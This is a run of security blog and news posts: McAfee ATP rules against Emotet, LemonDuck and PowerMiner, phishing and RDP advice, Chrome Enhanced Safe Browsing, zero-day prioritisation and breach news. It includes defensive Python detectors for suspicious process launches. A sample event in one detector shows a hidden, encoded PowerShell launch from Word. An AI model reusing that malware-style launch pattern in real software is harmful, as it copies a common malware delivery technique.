Change ‘Inherit from’ to ‘Break Inheritance and assign the policy and settings below’. Also, change the ‘Assigned policy’ to ‘High Protection’ from the dropdown list and click on ‘Save’. This will enable all the HighOn rules.

ATP Rules in the Wild

This section highlights three prevalent threats which ATP rules detect. We highlight one rule for each DefaultOn/HighOn/Evaluate to demonstrate the importance of monitoring rule updates and enabling more aggressive rules if they are suitable for your environment.

PowerMiner (DefaultOn example)

PowerMiner is cryptocurrency-mining malware that has been prevalent since 2019. We discussed this malware before in a previous blog on AMSI detection. The purpose of PowerMiner is to infect as many machines as possible to mine Monero. The initial infection vector is phishing emails that contain a batch file. Once run, this batch file executes a malicious PowerShell script that then begins the infection process.

ATP DefaultOn Rule 263 “Detect processes accessing suspicious URLs” and Rule 262 “Identify suspicious command parameter execution for Security rule group assignments” block this threat once Dropper.bat executes PowerShell and it attempts to download the malicious PS1 file.

This is shown by the red cross in the flow chart above. As mentioned in the AMSI blog, this threat is also covered by our AMSI signatures but as we do with several threats, we have different forms of detection in case the malware authors modify their code to attempt to bypass one of them.

The IP Map below shows the detections of this threat between October 2019 and January 2020 by the ATP Rules mentioned above.

LemonDuck (HighOn example)

LemonDuck, like PowerMiner, is coin-mining malware. It spreads via various methods such as the EternalBlue exploit and Mimikatz. Once a machine has been infected, LemonDuck creates several scheduled tasks to download various components, which include the coin-mining functionality. The flow chart below shows the LemonDuck infection process:

 

ATP HighOn rule 329 “Identify and block suspicious usage of Scheduled Tasks in high change systems” blocks LemonDuck at the scheduled task creation stage. Again, like PowerMiner, McAfee also has an AMSI signature which detects this threat as LemonDuck!<partial_hash>.

The IP Map below shows the detections of this threat between October 2019 and January 2020 by the ATP Rule mentioned above.

Emotet Downloader (Evaluate example)

Emotet is a Trojan responsible for downloading and executing several high-profile malware families, including Trickbot, which in turn has been known to download and execute the Ryuk ransomware. Emotet is usually downloaded and executed on the victim’s machine by malicious documents sent out via email spam. The malicious document uses PowerShell to download the Emotet executable and execute it. The flow is shown below:

 

McAfee ATP rule 256 ‘Detect use of long -encoded command PowerShell’ and rule 264 ‘Inspect EncodedCommand Powershell’ will detect this behavior if enabled. These rules are not enabled by default because this behavior can be legitimate, so we recommend checking the detections in Evaluate mode and, if no false positives occur, then turning them on. This rule will also block other malware that performs the same activity as Trickbot. The IP Map below shows the detections Rule 256 has had between October 2019 and January 2020. This includes all threats detected by this rule, not just Emotet.

Recommendations

By now you are likely asking yourself which rules you should turn on. First, it should be noted that enabling ATP rules has no performance impact; however, as highlighted in the first section, they can sometimes cause false positives.

From the collection of ATP rules, we recommend turning on the ‘Observe’ mode rules mentioned in this blog.

In addition to the rules mentioned for each threat, the following rules can be switched to ‘Enabled’ mode from the ePO console as described above. As mentioned, McAfee researchers continuously evaluate these rules, which can result in rules moving to a different rule group or merging into other existing rules.

  • Rule 238 – Identify abuse of common processes spawned from non-standard locations.
    • Protection from files being executed from suspicious locations which are often used by attackers.
  • Rule 309 – Block processes attempting to launch from Office applications.
    • Office documents are the main vectors used to deploy malware. This rule prevents Office applications from being abused to deliver malicious payloads.
  • Rule 312 – Prevent email applications, such as Outlook, from spawning script editors and dual-use tools.
    • Spam emails are a common initial attack vector used by malware authors. This rule helps detect suspicious use of email applications by preventing the launch of uncommon processes.
  • Rule 323 – Prevent mshta from being launched as a child process.
    • Related to MITRE technique T1170. Mshta.exe is a utility that executes Microsoft HTML Applications (HTA). Attackers can use mshta.exe to execute malicious .hta files and JavaScript or VBScript. This rule helps detect these malicious use cases. You can read more about mshta here.
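The rules above, together with rules 256 and 264 from the Emotet section, all key on the same kind of telemetry: which process launched which child, and with what command line. As an added illustration (written for this page, not McAfee’s rule logic or code), the Python sketch below applies checks analogous to those rules to a handful of constructed process-creation events and decodes a -EncodedCommand payload so that an analyst reviewing an Observe-mode detection can read what the script actually does. The process-name sets, the “long” length threshold and the sample events are assumptions made for the demonstration.

```python
"""Illustrative parent/child process detections in the spirit of the ATP rules above.

Constructed example, not McAfee's rule logic. Thresholds, name sets and the
sample events are assumptions chosen for this demonstration.
"""
import base64
import binascii
import re

# Assumed process name sets (hypothetical, not taken from the McAfee rule definitions).
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
EMAIL_APPS = {"outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "wscript.exe", "cscript.exe", "cmd.exe", "mshta.exe"}
LONG_ENCODED_MIN = 100  # assumed length (in base64 characters) for a "long" encoded command

# Matches -e / -ec / -enc / -EncodedCommand followed by a base64 blob.
ENCODED_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def decode_encoded_command(command_line):
    """Return the decoded script of a -EncodedCommand PowerShell invocation, or None."""
    match = ENCODED_FLAG.search(command_line)
    if not match:
        return None
    try:
        raw = base64.b64decode(match.group(1), validate=True)
        return raw.decode("utf-16-le")  # PowerShell encodes the script as UTF-16LE
    except (binascii.Error, UnicodeDecodeError):
        return None


def evaluate(event):
    """Return the list of detection labels an event triggers (empty if clean)."""
    parent = event["parent_image"].lower()
    image = event["image"].lower()
    cmdline = event["command_line"]
    hits = []

    match = ENCODED_FLAG.search(cmdline)
    if image == "powershell.exe" and match and len(match.group(1)) >= LONG_ENCODED_MIN:
        hits.append("long_encoded_powershell")    # analogous to rules 256 / 264
    if parent in OFFICE_APPS and image in SCRIPT_HOSTS:
        hits.append("office_spawns_script_host")   # analogous to rule 309
    if parent in EMAIL_APPS and image in SCRIPT_HOSTS:
        hits.append("email_spawns_script_host")    # analogous to rule 312
    if image == "mshta.exe":
        hits.append("mshta_child_process")         # analogous to rule 323
    return hits


def scan(events):
    """Map each event's id to the detection labels it triggers."""
    return {event["id"]: evaluate(event) for event in events}


# Constructed sample script and process-creation events (not real telemetry).
SAMPLE_SCRIPT = "Get-ChildItem C:\\Users | ForEach-Object { Write-Host $_.Name }"
SAMPLE_ENCODED = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode("ascii")
SHORT_ENCODED = base64.b64encode("dir".encode("utf-16-le")).decode("ascii")

SAMPLE_EVENTS = [
    {"id": 1, "parent_image": "WINWORD.EXE", "image": "powershell.exe",
     "command_line": "powershell.exe -NoP -W Hidden -Enc " + SAMPLE_ENCODED},
    {"id": 2, "parent_image": "OUTLOOK.EXE", "image": "wscript.exe",
     "command_line": "wscript.exe invoice.vbs"},
    {"id": 3, "parent_image": "explorer.exe", "image": "mshta.exe",
     "command_line": "mshta.exe update.hta"},
    {"id": 4, "parent_image": "explorer.exe", "image": "notepad.exe",
     "command_line": "notepad.exe notes.txt"},
    {"id": 5, "parent_image": "cmd.exe", "image": "powershell.exe",
     "command_line": "powershell.exe -enc " + SHORT_ENCODED},  # short: below threshold
]

if __name__ == "__main__":
    for event_id, labels in scan(SAMPLE_EVENTS).items():
        print(event_id, labels or "clean")
    # An analyst can read the decoded script before deciding whether a detection is a false positive.
    print(decode_encoded_command(SAMPLE_EVENTS[0]["command_line"]))
```

Event 1 trips two checks at once (Office parent and a long encoded command), event 5 shows why a length threshold matters (a short encoded `dir` is not flagged), and event 4 is the benign baseline. In a real deployment the equivalent of this review step is reading the Observe-mode detections in the ePO logs before switching a rule to Enabled.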

In general, we recommend looking through your ATP logs and checking to see if any ‘Observe’ mode rules are causing detections. If you find any rules that are not detecting legitimate use cases, we advise changing them to ‘Enabled’ mode.

We advise applying changes first to an ePO group containing a small number of machines and then monitoring that environment for any false positives. If there are none, you can then deploy the changes to a broader group.

KB Article KB82925 shows all the available ATP rules. You can also refer to the ATP Rules Release Notes which are updated when new rules are created, or existing ones are modified.

Conclusion

We hope that this blog has helped highlight how ATP rules protect your environment against a variety of threats and, by combining this technology with others like AMSI, we reinforce protection.

This blog continues a series that showcases our technology, so we also recommend reading the following:

McAfee Protects against suspicious email attachments

McAfee AMSI integration protects against malicious scripts

Using Expert Rules in ENS to prevent malicious exploits

What Is Mshta, How Can It Be Used and How to Protect Against It

 

All testing was performed with JTI Content Version 1134 and MVISION Endpoint Version 20.1.0.114 (in High Protection).

The post How To Use McAfee ATP to Protect Against Emotet, LemonDuck and PowerMiner appeared first on McAfee Blogs.

Protect Yourself Against Phishing Scams With These Security Tips

Making Media #FromHome

Phishing is one of the oldest cyberthreats in the book, and yet still one of the most effective. As people across the globe find themselves taking to the internet more than ever before, criminals see this as an opportunity to release phishing attacks on unsuspecting users. In fact, Security Boulevard found a 600% rise in phishing campaigns in the last month. So, as users leverage the World Wide Web to stay connected with friends and loved ones, it’s imperative that they remain wary of scammers looking to exploit our need to virtually communicate. With that, let’s take a look at why phishing is so effective even in 2020 and explore what actions users can take to stay protected. 

What is Phishing?

Phishing attacks occur when scammers attempt to trick users out of money or personal information, usually by email, phone, or text. With so many avenues for criminals to hook victims, phishing is one of the most prevalent threats we see today. As part of their phishing schemes, scammers often use something called social engineering to manipulate users into trusting them for fraudulent purposes, often by pretending to be a legitimate person or business. Through these phishing attacks, criminals can spread malware and other malicious content.  

The Evolution of Phishing

As new technology and circumstances arise, scammers find new ways to evolve the age-old technique of phishing. What originated as email and instant messages attempting to steal users’ credentials has since taken on new forms like SMiShing or adapted its content to hook the victim with a shocking subject line. 

Why has this technique continued to plague users since its inception? Hackernoon argues that it’s because phishing doesn’t require in-depth networking knowledge or even basic programming skills. It simply relies on human error and the lack of online security awareness, manipulating human psychology just as much as technological tools.  

Phishing Capitalizes on Emotion

Let’s face it – we’re all human. Our inherent psychology makes us quick to act on emotion. However, this is much of the reason why phishing has forged on as a favorite among hackers. Unfortunately, criminals tend to capitalize on bad or shocking news to grasp the victim’s attention, leading them to click on malicious links or give up personal data all too eagerly. Take today’s environment, for example. As businesses are faced with budget cuts and organizational restructuring, many users might be uncertain about their job security – an opportunity that scammers are eager to exploit. In fact, some organizations have recently observed phishing emails with subject lines reading “HR Termination List.” Through these malicious attempts, fraudsters use fear tactics to tempt recipients into clicking on links in emails or downloading dangerous content.  

With millions of users suddenly out of work, a lot of people have found themselves desperately looking for new job opportunities or seeking financial help. However, users should not let their guard down while job hunting, as this could prevent them from noticing the tell-tale signs of phishing. According to The Motley Fool, some phishing emails and text messages claim to offer work-from-home job opportunities, information about health insurance or Medicare, or loans or other forms of financial relief. In fact, the Federal Communications Commission (FCC) reported that many Americans have received texts from the “FCC Financial Care Center” offering $30,000 in relief for those who have recently been laid off or furloughed. While this might appear to be a saving grace, it is a stealthy ploy to trick users into giving up their credentials.

Act Now to Stay Protected

So, whether you’re working from home, participating in distance learning to complete college courses, or video chatting with loved ones, there will always be fraudsters looking to exploit your online activity. However, there are proactive measures you can take to help ensure your security. First and foremost is using comprehensive security software. If you’ve never been targeted by a phishing scam, it might be difficult to envision the benefit of installing a security solution. You might even be convinced that if you haven’t been targeted yet, then you won’t be in the future. However, there’s no off-season when it comes to security. As fraudsters continue to evolve their techniques, security software acts as an added safety net in the event that a phishing email appears in your inbox.

Aside from using comprehensive security software, here are some other tips to help protect your online security.  

Go directly to the source

Be skeptical of emails or text messages claiming to be from organizations with peculiar asks or with information that seems too good to be true. Instead of clicking on a link within the email or text, it’s best to go straight to the organization’s website or contact customer service. 

Be cautious of emails asking you to act

If you receive an email or text asking you to take a certain action or download software, don’t click on anything within the message. Instead, go straight to the organization’s website. This will prevent you from downloading malicious content from phishing links. 

Hover over links to see and verify the URL

If someone sends you a message with a link, hover over the link without actually clicking on it. This will allow you to see a link preview. If the URL looks suspicious, don’t interact with it and delete the message altogether. 

Stay Updated

To stay updated on all things McAfee and on top of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook. 

The post Protect Yourself Against Phishing Scams With These Security Tips appeared first on McAfee Blogs.

Enhanced Safe Browsing Protection now available in Chrome

Over the past few years we’ve seen threats on the web becoming increasingly sophisticated. Phishing sites rotate domains very quickly to avoid being blocked, and malware campaigns are directly targeting at-risk users. We’ve realized that to combat these most effectively, security cannot be one-size-fits-all anymore: That’s why today we are announcing Enhanced Safe Browsing protection in Chrome, a new option for users who require or want a more advanced level of security while browsing the web.

Turning on Enhanced Safe Browsing will substantially increase protection from dangerous websites and downloads. By sharing real-time data with Google Safe Browsing, Chrome can proactively protect you against dangerous sites. If you’re signed in, Chrome and other Google apps you use (Gmail, Drive, etc.) will be able to provide improved protection based on a holistic view of threats you encounter on the web and attacks against your Google Account. In other words, we’re bringing the intelligence of Google’s cutting-edge security tools directly into your browser.

Over the next year, we’ll be adding even more protections to this mode, including tailored warnings for phishing sites and file downloads and cross-product alerts.

Building upon Safe Browsing

Safe Browsing’s blocklist API is an existing security protocol that protects billions of devices worldwide. Every day, Safe Browsing discovers thousands of new unsafe sites and adds them to the blocklist API that is shared with the web industry. Chrome checks the URL of each site you visit or file you download against a local list, which is updated approximately every 30 minutes. Increasingly, some sophisticated phishing sites slip through that 30-minute refresh window by switching domains very quickly.

This protocol is designed so that Google cannot determine the actual URL Chrome visited from this information, and thus by necessity the same verdict is returned regardless of the user’s situation. This means Chrome can’t adjust protection based on what kinds of threats a particular user is seeing or the type of sites they normally visit. So while the Safe Browsing blocklist API remains very powerful and will continue to protect users, we’ve been looking for ways to provide more proactive and tailored protections.
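To make concrete why the blocklist protocol lets Google return a verdict without learning the visited URL, here is an added Python model of the hash-prefix scheme that the Safe Browsing Update API is built on (an illustration written for this page, not Chrome’s or Google’s implementation). The client hashes a few host/path expressions derived from the URL, compares only short hash prefixes against the locally downloaded list, and contacts the server, sending just the matching prefixes, only when there is a local hit. The constructed blocklist, the 4-byte prefix length, the class and function names and the simplified URL expressions are assumptions made for the example.

```python
"""Simplified Safe Browsing-style local blocklist check.

Added illustration, not Chrome's or Google's code. The listed expressions,
the prefix length and the URL expression rules are simplifications of the
Safe Browsing Update API scheme; all names below are assumptions.
"""
import hashlib
from urllib.parse import urlsplit

PREFIX_LEN = 4  # assumed prefix length for this illustration (the real API allows 4..32 bytes)


def url_expressions(url):
    """Host-suffix / path-prefix combinations a client hashes for one URL.

    Simplified from Safe Browsing canonicalization: the full host plus its
    shorter suffixes (at least two labels), combined with "/" and each path
    prefix. Query strings and ports are ignored here.
    """
    parts = urlsplit(url if "://" in url else "http://" + url)
    if not parts.hostname:
        return []
    host = parts.hostname.lower()
    path = parts.path or "/"
    labels = host.split(".")
    hosts = [".".join(labels[i:]) for i in range(0, len(labels) - 1)]
    segments = path.strip("/").split("/") if path != "/" else []
    paths = {"/", path}
    for i in range(1, len(segments)):
        paths.add("/" + "/".join(segments[:i]) + "/")
    return sorted(h + p for h in hosts for p in paths)


def full_hash(expression):
    """SHA-256 of an expression; only a short prefix of this ever leaves the client."""
    return hashlib.sha256(expression.encode("utf-8")).digest()


class SafeBrowsingServer:
    """Stand-in for the backend (constructed for this example, not Google's service)."""

    def __init__(self, listed_expressions):
        self.full_hashes = {full_hash(e) for e in listed_expressions}
        self.requests = []  # records what the client actually sent over the network

    def prefix_list(self):
        """The list clients download periodically: hash prefixes only, no URLs."""
        return {h[:PREFIX_LEN] for h in self.full_hashes}

    def find_full_hashes(self, prefixes):
        """Answer a prefix query with every listed full hash sharing one of the prefixes."""
        self.requests.append(sorted(prefixes))
        wanted = set(prefixes)
        return [h for h in self.full_hashes if h[:PREFIX_LEN] in wanted]


def is_unsafe(url, local_prefixes, server):
    """Client-side verdict: local prefix check first, full-hash lookup only on a hit."""
    candidates = {full_hash(e) for e in url_expressions(url)}
    matched = {h[:PREFIX_LEN] for h in candidates if h[:PREFIX_LEN] in local_prefixes}
    if not matched:
        return False  # common case: decided locally, nothing is sent anywhere
    # A prefix match may be a coincidence, so fetch the full hashes behind it and
    # compare them locally; the server only ever learns the short prefixes.
    return any(h in candidates for h in server.find_full_hashes(matched))


# Constructed blocklist for the demonstration (not real Safe Browsing data).
LISTED = ["phish.example.test/login/", "malware.example.test/"]
SERVER = SafeBrowsingServer(LISTED)
LOCAL_LIST = SERVER.prefix_list()  # what Chrome would refresh roughly every 30 minutes

if __name__ == "__main__":
    for u in ["http://phish.example.test/login/index.html",
              "http://www.example.test/about",
              "https://cdn.malware.example.test/update.exe"]:
        print(u, "->", "UNSAFE" if is_unsafe(u, LOCAL_LIST, SERVER) else "ok")
    print("server saw only prefixes:", SERVER.requests)
```

Two properties of the text fall out of the model: a URL that is not on the list never causes a network request at all, and when a request is made it carries only a few bytes of hash, from which the server cannot reconstruct the page. The same design is what limits the verdict to a one-size-fits-all answer, since the server has no URL or user context to tailor it with, which is the gap the Enhanced mode described next is meant to close. It also shows the weakness the paragraph above notes: a site that moves to a new domain between two list refreshes is simply absent from the local prefixes.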

How Enhanced Safe Browsing works

When you switch to Enhanced Safe Browsing, Chrome will share additional security data directly with Google Safe Browsing to enable more accurate threat assessments. For example, Chrome will check uncommon URLs in real time to detect whether the site you are about to visit may be a phishing site. Chrome will also send a small sample of pages and suspicious downloads to help discover new threats against you and other Chrome users.

If you are signed in to Chrome, this data is temporarily linked to your Google Account. We do this so that when an attack is detected against your browser or account, Safe Browsing can tailor its protections to your situation. In this way, we can provide the most precise protection without unnecessary warnings. After a short period, Safe Browsing anonymizes this data so it is no longer connected to your account.

You can opt in to this mode by visiting Privacy and Security settings > Security > and selecting the “Enhanced protection” mode under Safe Browsing. It will be rolled out gradually in M83 on desktop platforms, with Android support coming in a future release. Enterprise administrators can control this setting via the SafeBrowsingProtectionLevel policy.

Tailored protections

Chrome’s billions of users are incredibly diverse, with a full spectrum of needs and perspectives in security and privacy. We will continue to invest in both Standard and Enhanced Safe Browsing with the goal to expand Chrome’s security offerings to cover all users.

The “Zero Day” Conundrum

In my last blog I talked about how we should define “zero day” and the many misuses which in my view muddy the waters, making it ever more difficult to address the actual problem. In case you missed that one you can read it here, or you can simply accept the premise that zero day threats are very rare.

Either way, I absolutely accept that we shouldn’t stop worrying about zero-day threats completely, but I do think we should put them into context and focus our resources accordingly. The VAST majority of malware we face is not zero day and is in fact exploiting vulnerabilities that are known about and have available patches to render them ineffective.

Focusing your resources accordingly will, of course, depend on how many resources you have and how skilled they are, so you should adapt the list below to fit your situation, but as a general rule here’s how I would prioritize things:

Application of new patches is a key part of your defense.

There are times (and places) where patching cannot be implemented immediately, but if you can patch you should do so – and do so as fast as possible.

Don’t overlook the importance of user education.

A significant proportion of malware is delivered via phishing attacks and better training would reduce the number of times these links are activated, resulting in fewer attacks that your other defenses need to identify and block (and of course fewer they can potentially miss).

Defense in depth is the only sensible approach.

As malware creators become more adept at tricking users and technology alike, putting all your eggs in one basket seems to be a more and more outdated approach. An endpoint security solution that leverages multiple methods of protection has a higher chance of being effective.

      • The fastest and least resource intensive method of catching malware is via signatures. It may sound a bit ‘last century’ and it’s true that signatures can only catch malware that has already been seen elsewhere (and you may even be thinking about that 725,000 number I mentioned in my previous blog) but keep in mind that even if this method won’t catch the very newest malware it’s still the best way to identify the other 925 million malware files in the database. Filtering out the known bad files without overtaxing your PC allows more CPU cycles for other tasks – namely, the machine learning methods in the next 2 points but even more importantly, running the applications you actually turned the PC on for!
      • Once you have filtered out a large proportion of the known bad malware, you need to think about how to protect against the small percentage for which signatures do not exist, and that brings us back to the previously mentioned machine learning. To understand more about machine learning in general, try reading this blog written by one of my colleagues. But, for the purposes of this blog, and in the context of anti-malware, machine learning comes in two fundamental flavors: pre-execution machine learning and post-execution machine learning (or machine-learning-assisted behavioral analysis). The pre-execution flavor does exactly what it says on the tin: it examines a file before it allows it to execute and tests it against a malware model. If it deems the file statistically likely to be malware, it blocks it, critically before it is allowed to execute and therefore before it can do any damage whatsoever. Post-execution machine learning requires the file to execute and then, instead of examining the static file for indications of maliciousness, watches the actual behavior of the process(es). Once this trace data is available it can be compared to a different type of model and again an estimation can be made as to whether it is likely to be malicious or not. Both variants have value and complement each other, so just as you should be looking at signature and non-signature based detection, you should be looking at pre- and post-execution versions of machine learning.
      • The scenario outlined above where post-execution scanning is required (because the pre-execution scan has not identified something that is malicious and allows it to execute) is a neat segue into the value of application containment. This concept, delivered by McAfee back in 2017, is designed to minimize the damage that a malicious process can achieve even when the endpoint defenses have been deceived. This is of particular importance given the current prevalence of crypto-malware, whereby even if the behavioral analysis does identify malware running on your system it may have already deleted restore points, encrypted data and overwritten source files. Dynamic Application Containment will identify if a file has no reputation and if it doesn’t (so it is not known as either good or bad), and assuming the pre-execution scanning suggests it is safe, will allow it to execute but will contain it at the same time. This means that should it subsequently turn out to be malicious it will have been prevented from, for example, overwriting user data, modifying the registry, accessing network shares and a whole host of other things we wouldn’t want the bad guys to do.

Application Control

  • In some environments you can also consider application control as a way of ensuring that malicious code cannot take advantage of any vulnerabilities that may exist. This is a whitelist type approach that allows the IT department to predefine a set of applications and code that is allowed to execute and simply blocks everything else. Since malicious code won’t be on the whitelist it can never run, so why isn’t this the default position of every enterprise worldwide? Answer: because it tends to result in the IT department being overrun with irate users trying to get the job done and discovering that only a limited set of applications will work. One person is a lover of a different web browser, but they’re blocked from using that application. Another person has a personal device and wants to load the relevant software to connect it, but they can’t. A third person wants to use their great new presentation clicker only to find it needs its own software, and that’s not allowed. The list goes on, and the users get more irate.

Endpoint Protection

  • Some endpoint security solutions are better than others, but it is worth keeping in mind that there has never been, nor will there ever be one that is 100% perfect. No vendor can guarantee that malware or hackers will never find their way into your environment and that is why there is a burgeoning market for Endpoint Detection and Response (EDR) solutions. These solutions are designed to continually analyze and interrogate your infrastructure to detect low-level malicious activity that is going unidentified by other defense systems, and then enable you to react to those threats, isolate infected systems, remediate the damage and restore normal service as quickly as possible.

In summary, zero day threats are a pretty long way down the list of things I think companies should be focusing on addressing. That’s not to say they should be ignored, but there are easier things to fix and which are likely to have a more positive impact. My advice would be to hold off until patching is fully under control, the users know how to act as your first line of defense and you have a good quality antimalware solution (leveraging both signatures and machine learning) installed. Only then should you be turning your attention to the dangers of the ‘zero day’!

The post The “Zero Day” Conundrum appeared first on McAfee Blogs.

EasyJet hacking attack: are you affected and what should you do?

The airline has said the personal information of 9 million customers has been compromised

EasyJet revealed on Tuesday it had suffered a “highly sophisticated” cyber-attack. It comes at a time of heightened concern about a surge in online and phone scams linked to the coronavirus pandemic.

Related: EasyJet reveals cyber-attack exposed 9m customers' details


Announcing Our State of Software Security: Open Source Edition Report

Today, we published a special supplement to our annual State of Software Security report that focuses exclusively on the security posture of the open source libraries found in applications. Prominent in almost every application today, open source libraries allow developers to move faster by quickly adding basic functionality. In fact, it would be nearly impossible to innovate with software without these libraries. However, lack of awareness about where and how open source libraries are being used and their risk factors is a problematic practice. This analysis, which examined 351,000 external libraries in 85,000 applications, found that open source libraries are, as expected, ubiquitous in applications, and that they do in fact contain risky code. But it also unearthed some good news about ways to keep track of and alleviate that risk. The report's highlights include:

Open source libraries are ubiquitous, and risky

Open source libraries make up a significant portion of most applications' code. Our research found that most JavaScript applications contain hundreds of open source libraries; some have over 1,000 different libraries. In addition, most languages feature the same set of core libraries. JavaScript and PHP in particular have several core libraries that are in just about every application.

Along with their prevalence comes risk. The report found that 70 percent of applications have a security flaw in an open source library on initial scan. Cross-Site Scripting is the most common vulnerability category found in open source libraries (present in 30 percent of libraries), followed by insecure deserialization (23.5 percent) and broken access control (20.3 percent).

Developers may be pulling in more libraries than they realize

This report highlights the amount of interconnected dependencies among open source libraries, and how that can be contributing to layers of hidden risk. In fact, our data reveals that most flawed libraries end up in code indirectly. Forty-seven percent of the flawed libraries in applications are transitive; in other words, they are not pulled in directly by developers, but are being pulled in by the first library (42 percent are pulled in directly, 12 percent are both). This means that developers are introducing much more code, and often flawed code, than they might be anticipating.

Securing these libraries is not necessarily a major undertaking

In the good news department, addressing the security flaws in these libraries is most often not a significant job. Most library-introduced flaws (nearly 75 percent) in applications can be addressed with only a minor version update. Major library upgrades are not usually required!

This data point suggests that this problem is one of discovery and tracking, not huge refactoring of code.

See below for the data highlights, and check out the full report for all the data details, plus our advice on how to use the story told by the numbers to improve your own application security program.

EasyJet reveals cyber-attack exposed 9m customers’ details

Airline apologises after credit card details of about 2,200 passengers were stolen
Q&A: are you affected and what should you do?

EasyJet has revealed that the personal information of 9 million customers was accessed in a “highly sophisticated” cyber-attack on the airline.

The company said on Tuesday that email addresses and travel details were accessed and it would contact the customers affected.


Passwords are and have always been an Achilles Heel in CyberSecurity

LogMeOnce, a password identity management suite provider, has published a detailed interview with me titled 'Passwords are and have always been an Achilles Heel in CyberSecurity'. In the Q&A I talk about Password Security (obviously), Threat Actors, IoT Security, Multi-Factor Authentication (MFA), Anti-Virus, Biometrics, AI, Privacy, and a bit on how I got into a career in Cybersecurity.

Quotes

“I’m afraid people will remain the weakest link in security, and the vast majority of cybercriminals go after this lowest hanging fruit. It’s the least effort for the most reward.”

"There is no silver bullet with password security, but MFA comes close; it significantly reduces the risk of account compromise"

"The built-in biometric authentication capabilities of smartphones are a significant advancement for security"

"Cybercriminals go after this lowest hanging fruit, the least effort for the most reward."

"As technology becomes more secure and more difficult to defeat, it stands to reason criminals will increasingly target people more."

"The impact of the WannaCry ransomware outbreak on NHS IT systems is a recent example of such cyberattack which threatens lives."

"Machine Learning can provide real benefits, especially in large Security Operations Centres (SOC), by helping analysts break down the steady stream of data into actionable intelligence, reducing workload and false-positive errors."

"When I look at new technology today, I still seek to thoroughly understand how it works, naturally thinking about the weaknesses which could be exploited, and the negative impact of such exploits on the people and businesses using the technology. I developed a kind of a ‘hacker’s eye for business’"

How to Stay Protected From Malware While Online at Home

Our everyday lives are not what they were three months ago. Many users have made the transition from working in an office to working from home, and students have adopted distance learning. But while the world focuses on one virus sweeping the globe, criminals see an opportunity to spread other types of viruses across our networks and devices.

As users adapt to their increased time spent at home and online, hackers are taking advantage by spreading malware and other scams. Let's break down some of the major malware scams affecting users today, as well as how they can stay secure.

Remote Workers Targeted Through RDP Ports

With recent events accelerating the WFH trend, many companies have restricted employee travel and allocated more resources to enable virtual work. According to McAfee security researcher Thomas Roccia, a key component of enabling remote work and allowing employees to access internal corporate resources remotely is Remote Desktop Protocol (RDP), a Microsoft protocol for interacting with a remote system. At a time when connectivity matters more than ever, users need to reach the same tools and apps from their new remote work environments that they would use in the office. However, it is likely that many organizations brought systems online quickly with minimal security checks in place, giving attackers the opportunity to infiltrate them with ease. Because RDP ports are often exposed to the internet, an attacker could gain access to an entire network and, consequently, to a remote employee's system. What's more, these networks can then be used as entry points for spreading malware or other malicious activity.

Since March 2020, the McAfee Advanced Threat Research team has seen a significant increase in the number of exposed RDP ports. But what does that mean for users working remotely? Because exposed RDP ports give criminals a path into remote systems, they can launch a number of threats that affect not only users working from home but also the organizations they work for: spreading spam and malware, and using the compromised RDP host to disguise malicious activity and compile their tools on the machine.

Phishing Emails Spreading Malware and Ransomware

Recently, hackers have also leveraged phishing emails about current events to lure people into engaging with malicious content and letting threats gain access to their systems. Once established, that foothold lets hackers use malware to steal usernames, passwords and data, monitor user activity, capture keystrokes, track network traffic and browser activity, and move into networks and cloud services beyond the home. Criminals can also impersonate their victim, sending email from the infected device to propagate to other systems. What's more, hackers can deploy ransomware that encrypts system files and withholds the decryption key until the victim pays a ransom.

Stay Secure in the New Digital Landscape

Hackers will always seek to capitalize on current events in order to spread cyber misfortune. The recent surge of remote employees and users taking to the internet in order to pass the time is no exception.  However, there are several steps users can take to facilitate a safe online environment for themselves and their families. Here’s what you can do to stay protected from malware regarding the current health emergency and similar threats: 

Secure your RDP protocol

Because RDP remains one of the most used vectors for breaking into organizations and personal networks, it's important to follow security best practices: use strong passwords and multi-factor authentication, patch vulnerabilities immediately, and do not expose RDP directly to the open internet (reach it through a VPN or a remote desktop gateway instead). Discover more best practices on how to secure RDP in our blog on RDP security.

Beware of messages from unknown users

If you receive a text, email, social media message, or phone call from an unknown user regarding the current health emergency, it’s best to proceed with caution and avoid interacting with the message altogether.   

Go directly to the source

If you receive information from an unknown user, go directly to the source instead of clicking on links within messages or attachments. Using a tool like McAfee WebAdvisor can help users stay safe from malware and other threats while searching the web.   


Good Malware Protection Doesn’t Need to Slow You Down!


“Security software slows down my PC.” This is a comment often heard when talking about malware protection on computers and laptops. While this may be true for many security products, including the security software built into the Windows operating system, it is not the case with McAfee security. In fact, independent tests since 2016 have shown that McAfee is not only good at catching malware, it is also one of the lightest security products available today.

What is malware protection?

Security software continuously keeps an eye on all the data that comes in and goes out of your PC. It does this in order to verify that there are no security threats to your personal data, privacy and identity while you are, for example, shopping online, checking your social media or working remotely.

Because security software is always active and protecting in the background, many users assume that malware protection necessarily slows down their PCs. This idea, however, is likely based on experiences from long ago, when certain security products did indeed have a serious impact on the user experience.

Measuring PC Performance

To measure how much impact malware protection has on PC performance nowadays, some independent test labs include performance impact benchmarks in their security product tests. The best known of these are AV-TEST, based in Germany, and the Austria-based AV-Comparatives, which are among the most reputable anti-malware test labs in the world.

In their tests both labs look at ~20 security brands, including McAfee, and the test results show that McAfee Total Protection is one of the lightest security products available today.

Let’s have a closer look at what AV-TEST and AV-Comparatives have to say.

AV-TEST

Every two months AV-TEST publishes the results of its on-going tests of 20 security products. As part of these tests the lab continuously evaluates the latest versions of all products using their default settings and measures the average impact of the product on computer speed in daily use.

A security product can achieve a maximum of 6 points depending on the test results. McAfee has consistently received the highest score in all performance tests since May 2018:

AV-Test PC Performance

Because of these excellent test results McAfee Total Protection was awarded the ‘2019 Performance Award’ by AV-TEST in March 2020.

AV-TEST Best Performance 2019 Award

Below is what AV-TEST states about the award and about McAfee Total Protection:

Only products that make a high-performance finish in the AV-TEST labs throughout the test period of an entire year can claim this proof of absolute peak performance. With the AV-TEST Awards, a security product proves not only its technical superiority. Above all, it proves that it is documented as being the best the market currently has to offer in the fight against cyber-attacks.

